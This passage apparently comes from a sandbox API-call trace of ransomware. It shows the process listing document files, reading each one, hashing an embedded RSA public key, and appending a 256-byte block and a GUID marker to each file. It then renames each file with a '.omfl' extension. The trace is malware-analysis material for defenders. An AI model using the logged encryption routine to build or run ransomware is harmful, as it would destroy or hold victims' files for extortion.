KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.982] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.983] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.983] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.983] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.983] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.983] GetLastError () returned 0x0 [0131.983] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.983] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.983] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.983] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.983] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.984] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.984] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x16d18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.984] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.985] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.985] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.985] CloseHandle (hObject=0x610) returned 1 [0131.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0131.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x74fb288 [0131.989] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\PawJosFHZ0fIzCf-ldL_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\pawjosfhz0fizcf-ldl_.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\PawJosFHZ0fIzCf-ldL_.odt.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\pawjosfhz0fizcf-ldl_.odt.omfl")) returned 1 [0131.990] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x915de8c0, ftCreationTime.dwHighDateTime=0x1d5de48, ftLastAccessTime.dwLowDateTime=0xe6756180, ftLastAccessTime.dwHighDateTime=0x1d5dd67, ftLastWriteTime.dwLowDateTime=0xe6756180, ftLastWriteTime.dwHighDateTime=0x1d5dd67, nFileSizeHigh=0x0, nFileSizeLow=0x510d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S3zHl9pH0.pps", cAlternateFileName="S3ZHL9~1.PPS")) returned 1 [0131.991] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.991] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0131.991] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\S3zHl9pH0.pps") returned=".pps" [0131.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\S3zHl9pH0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\s3zhl9ph0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.991] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=20749) returned 1 [0131.991] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.994] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x50e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.994] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.995] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x510d, lpOverlapped=0x0) returned 1 [0131.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.996] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.997] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.997] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.997] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.997] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.997] GetLastError () returned 0x0 [0131.997] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.997] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.997] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.997] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.997] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.997] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.998] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x510d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.998] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.998] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.998] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.999] CloseHandle (hObject=0x610) returned 1 [0132.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0132.000] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\S3zHl9pH0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\s3zhl9ph0.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\S3zHl9pH0.pps.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\s3zhl9ph0.pps.omfl")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbe37d70, ftCreationTime.dwHighDateTime=0x1d5e6cd, ftLastAccessTime.dwLowDateTime=0x30e5f0d0, ftLastAccessTime.dwHighDateTime=0x1d5e539, ftLastWriteTime.dwLowDateTime=0x30e5f0d0, ftLastWriteTime.dwHighDateTime=0x1d5e539, nFileSizeHigh=0x0, nFileSizeLow=0x132e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTEvQ1YlaGmeFk1mp.ods", cAlternateFileName="STEVQ1~1.ODS")) returned 1 [0132.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.002] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\sTEvQ1YlaGmeFk1mp.ods") returned=".ods" [0132.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\sTEvQ1YlaGmeFk1mp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\stevq1ylagmefk1mp.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.002] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=78562) returned 1 [0132.002] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.005] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x132bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.005] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.006] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x132e2, lpOverlapped=0x0) returned 1 [0132.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.007] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.008] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.008] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.008] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.008] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.008] GetLastError () returned 0x0 [0132.009] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.009] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.009] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.009] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.009] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.009] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.010] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x132e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.010] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.010] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.010] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.010] CloseHandle (hObject=0x610) returned 1 [0132.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0132.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.012] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\sTEvQ1YlaGmeFk1mp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\stevq1ylagmefk1mp.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\sTEvQ1YlaGmeFk1mp.ods.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\stevq1ylagmefk1mp.ods.omfl")) returned 1 [0132.014] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d93e350, ftCreationTime.dwHighDateTime=0x1d5da89, ftLastAccessTime.dwLowDateTime=0x2f0d3d60, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0x2f0d3d60, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0x14a51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W5rIjvHFFgw34_o1.odp", cAlternateFileName="W5RIJV~1.ODP")) returned 1 [0132.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.014] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\W5rIjvHFFgw34_o1.odp") returned=".odp" [0132.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\W5rIjvHFFgw34_o1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\w5rijvhffgw34_o1.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.015] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=84561) returned 1 [0132.015] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.018] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x14a2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.018] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.019] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x14a51, lpOverlapped=0x0) returned 1 [0132.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.019] lstrlenA (lpString="-----BEGIN PUBLIC 